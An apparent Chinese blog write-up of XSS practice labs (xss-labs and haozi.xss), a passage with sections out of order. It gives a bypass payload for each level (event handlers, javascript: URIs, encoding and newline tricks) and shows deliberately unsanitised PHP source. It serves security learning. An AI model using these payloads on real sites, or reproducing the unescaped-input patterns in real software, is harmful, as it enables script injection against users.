class="line"><span class="keyword">echo</span> <span class="string">'<body><span class="ng-include:'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></body>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 16</p> <p>本题在<center>标签内,根据后面的<img>标签提示,我们可以构造一个img标签</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204141319824.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204141319824.png" alt="image-20240204141319824" ></a></p> <p>经过尝试发现过滤了空格,我们可以用<code>%0A</code>换行符绕过空格</p> <p><strong>答案:<code>keyword=<img%0Asrc=1%0Aonclick="alert(1)"></code></strong></p> <p>答案实际形式:</p> <figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">keyword=<img</span><br><span class="line">src=1</span><br><span class="line">onclick="alert(1)"></span><br></pre></td></tr></table></figure> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level17.php?arg01=a&arg02=b"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level16<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level16<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = strtolower($_GET["keyword"]);</span></span><br><span class="line"><span class="meta">$str2=str_replace("script","&nbsp;",$str);</span></span><br><span class="line"><span class="meta">$str3=str_replace(" ","&nbsp;",$str2);</span></span><br><span class="line"><span class="meta">$str4=str_replace("/","&nbsp;",$str3);</span></span><br><span class="line"><span class="meta">$str5=str_replace(" ","&nbsp;",$str4);</span></span><br><span class="line"><span class="meta">echo "<center>".$str5."</center>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level16.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 17</p> <p>查看网页源代码可知有两个参数arg01和arg02,进行尝试后发现会拼接在<embed>标签内,有src属性</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142001519.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142001519.png" alt="image-20240204142001519" ></a></p> <p>可以构造以下payload</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142237099.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142237099.png" alt="image-20240204142237099" ></a></p> <p><strong>答案:<code>arg01=a&arg02= onMouseOver=alert(1)</code></strong></p> </li> <li> <p>Level 18</p> <p>本题与17题一致,payload相同</p> </li> </ul> <h3 id="haozi-xss题解">haozi.xss题解</h3> <p>网址: <a class="link" href="https://xss.haozi.me/" >https://xss.haozi.me/<i class="fas fa-external-link-alt"></i></a></p> <ul> <li> <h4 id="0x00">0x00</h4> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204143959934.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204143959934.png" alt="image-20240204143959934" ></a></p> </li> </ul> <p><strong>答案:<code><script>alert(1)</script></code></strong></p> <ul> <li> <h4 id="0x01">0x01</h4> <p>注入点在<textarea></textarea>标签中,故按照0x00的方法无法被解析,可提前闭合标签。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144343303.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144343303.png" alt="image-20240204144343303" ></a></p> <p><strong>答案:<code></textarea><script>alert(1)</script></code></strong></p> <p>也可以利用error事件:<code></textarea><img src="" onerror=alert(1)></code>,由于src是空,所以肯定会报错,,故通过错误调用事件成功注入</p> </li> <li> <h4 id="0x02">0x02</h4> <p>本题input标签内的value会将值转化为字符串,然后显示在输入框内,故前两题的标签闭合注入会失效,可以借鉴SQL注入的方法,将前面的双引号闭合,然后注入新的标签</p> <p>答案:<code>" > <script>alert(1)</script></code></p> <p>也可以使用onclick事件:</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144832842.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144832842.png" alt="image-20240204144832842" ></a></p> <p><strong>答案:<code>" onclick="alert(1)</code></strong></p> </li> <li> <h4 id="0x03">0x03</h4> <p>过滤符号:<code>() <></code> ,在JavaScript中可以使用反引号`` <code>来代替</code>()`</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204150455947.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204150455947.png" alt="image-20240204150455947" ></a></p> <p><strong>答案:<code><script>alert</code>1<code></script></code></strong></p> <p>或:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert</span>`<span class="attr">1</span>\`></span>123<span class="tag"></<span class="name">a</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x04">0x04</h4> <p>过滤符号:小括号(),中括号[],反引号` 可使用HTML实体编码绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151017389.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151017389.png" alt="image-20240204151017389" ></a></p> <p><strong>答案:</strong></p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert&#40;1&#41;</span>></span>123<span class="tag"></<span class="name">a</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x05">0x05</h4> <p>HTML的注释有两种方式:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"><!-- 注释内容 --></span></span><br><span class="line"><span class="comment"><!-- 注释内容 --!></span></span><br></pre></td></tr></table></figure> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151215313.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151215313.png" alt="image-20240204151215313" ></a></p> <p><strong>答案:<code>--!><script>alert(1)</script></code></strong></p> </li> <li> <h4 id="0x06">0x06</h4> <p>正则表达式匹配了:<strong>auto</strong> 、<strong>以on开头且以=结尾的字符串</strong>、 <strong>></strong></p> <p>所以过滤了autofocus和onerror等事件,以及防止input标签被闭合。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204152604165.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204152604165.png" alt="image-20240204152604165" ></a></p> <p>可以通过换行<code>%0A</code>来绕过匹配,<strong>答案:</strong></p> <figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">type="image" src="" onerror</span><br><span class="line">=alert(1)</span><br><span class="line"></span><br><span class="line">onclick</span><br><span class="line">=alert(1)</span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x07">0x07</h4> <p>本题主要利用html部分单标签可以解析,例如img标签</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153048091.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153048091.png" alt="image-20240204153048091" ></a></p> <p><strong>答案:<code><img src="" onerror=alert(1)</code></strong></p> </li> <li> <h4 id="0x08">0x08</h4> <p>使用正则过滤</style>,可以多加一个空格或使用换行符造成正则逃逸。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153220204.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153220204.png" alt="image-20240204153220204" ></a></p> <p><strong>答案:<code></style ><img src=1 onerror="alert(1)"</code></strong></p> </li> <li> <h4 id="0x09">0x09</h4> <p>本题使用正则表达式白名单匹配固定网址,可在正确的网址后多加字符,再把前面的双引号闭合,再输入onerror错误事件</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153430571.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153430571.png" alt="image-20240204153430571" ></a></p> <p><strong>答案:<code>https://www.segmentfault.com" onerror="alert(1)</code></strong></p> </li> <li> <h4 id="0x0A">0x0A</h4> <p>本题通过html转义, 过滤了所有可注入的关键字,经研究(看答案)可知,可直接引用指定网站下的目录文件来达到xss注入的目的,如在靶场的目录下有个j.js文件, 内有alert(1);代码, 直接调用即可注入,<strong>答案:<code>https://www.segmentfault.com.haozi.me/j.js</code></strong></p> <p>也可用url的@语法来进行跳转调用,例如<code>https://www.baidu.com@www.bing.com</code> ,最终会跳转到bing上,根据此原理可以在其他服务器上事先写好alert(1);并跳转执行。</p> </li> <li> <h4 id="0x0B">0x0B</h4> </li> <li> <h4 id="0x0C">0x0C</h4> </li> <li> <h4 id="0x0D">0x0D</h4> </li> <li> <h4 id="0x0E">0x0E</h4> </li> <li> <h4 id="0x0F">0x0F</h4> </li> <li> <h4 id="0x10">0x10</h4> </li> <li> <h4 id="0x11">0x11</h4> </li> <li> <h4 id="0x12">0x12</h4> </li> </ul>
  • 、等标签内均可插入标签来执行JavaScript恶意代码</p> <p>此处可以参考:<a class="link" href="https://blog.csdn.net/LYJ20010728/article/details/116462782" >XSS常见的触发标签<i class="fas fa-external-link-alt"></i></a></p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202143032203.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202143032203.png" alt="image-20240202143032203" ></a></p> <p><strong>答案:<code><script>alert(1)</script></code></strong></p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level2.php?keyword=test"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level1<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level1<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["name"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>欢迎用户".$str."</h2>";//这里直接进行调用,根本没有过滤</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level1.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 2</p> <p>可以尝试如Level 1的方法但是没有成功,再次查看源代码发现第一处的<>符号被html实体转义,只能从第二处进行注入,input标签不可内含script标签,故此处提前闭合input标签,构造一个新的script标签执行恶意代码。<a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/1706856310681.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/1706856310681.png" alt="1706856310681" ></a></p> <p><strong>答案:<code>">\<script>alert(1)\</script></code></strong></p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level3.php?writing=wait"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level2<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level2<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["keyword"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center></span></span><br><span class="line"><span class="meta"><form action=level2.php method=GET></span></span><br><span class="line"><span class="meta"><input name=keyword value="'.$str.'"></span></span><br><span class="line"><span class="meta"><input type=submit name=submit value="搜索"/></span></span><br><span class="line"><span class="meta"></form></span></span><br><span class="line"><span class="meta"></center>';</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level2.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 3</p> <p>如下图所示,本题过滤了<>和",经过测试发现 ’ 未被过滤,则可以在input标签内内联JavaScript代码</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202144949589.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202144949589.png" alt="img" ></a></p> <p><strong>答案:<code>' onclick='alert(1)</code></strong>,然后使用鼠标单击该输入框即可</p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level4.php?keyword=try harder!"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level3<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level3<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["keyword"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center></span></span><br><span class="line"><span class="meta"><form action=level3.php method=GET></span></span><br><span class="line"><span class="meta"><input name=keyword value='".htmlspecialchars($str)."'></span></span><br><span class="line"><span class="meta"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="meta"></form></span></span><br><span class="line"><span class="meta"></center>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level3.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 4</p> <p>与Level 3相同,注意使用的是双引号即可</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202145526384.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202145526384.png" alt="image-20240202145526384" ></a></p> <p><strong>答案:<code>" onclick="alert(1)</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level4.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str3</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level4.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str3</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 5</p> <p>本题在先前基础上过滤了关键字 on ,使得所有带on的方法都不可使用,故使用伪协议构造<a href=></p> <p><strong>若过滤是被替换为空,则可进行双写绕过,若是增加下划线等破坏原有结构则需使用其他方法绕过</strong></p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/e51d1669fc381c1c00e22113b0f8bea.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/e51d1669fc381c1c00e22113b0f8bea.png" alt="e51d1669fc381c1c00e22113b0f8bea" ></a></p> <p><strong>答案:<code>"><a href="[javascript:alert(1)](about:blank)">123</a>//</code></strong>,其中//为注释后面的内容</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level5.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str3</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level5.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str3</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 6</p> <p>本题用增加下划线的方式过滤href标签,可采用大小写绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202153331833.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202153331833.png" alt="image-20240202153331833" ></a></p> <p><strong>答案<code>"><a HREF="javascript:alert(1)">1</a>//</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 